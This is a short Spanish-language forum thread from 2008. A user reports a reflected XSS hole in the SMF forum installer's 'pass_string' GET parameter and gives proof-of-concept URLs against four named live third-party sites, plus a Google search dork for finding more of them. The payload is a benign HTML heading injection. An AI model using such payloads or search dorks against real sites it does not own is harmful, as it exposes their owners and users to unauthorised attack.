XSS en el instalador de SMF

WHK · 19 Mayo 2008, 00:24 AM

Curosiando unos minutos encontré algunos instaladores de smf y me di cuenta que la variable pass_string tiene XSS en método GET.

POC:

Código [Seleccionar]

http://casa.zimzum.es/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.evolutiv.eu/SMF/install.php?&obgz=1&pass_string=<h1>WHK
http://world-eyes.fr/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.pelusonas.com/foro/install.php?obgz=1&pass_string=<h1>WHK

Fuente:
http://www.google.cl/search?hl=es&q=allinurl%3Asmf+%2B+install.php

Salu2.

dimitrix · 19 Mayo 2008, 09:21 AM

Muy bueno, pero creo que si algún administrador no borra los archivos de instalación, ese XSS será su menor problemas XD

Muchas gracias de nuevo.

Test Foro de elhacker.net SMF 2.1

XSS en el instalador de SMF

WHK

dimitrix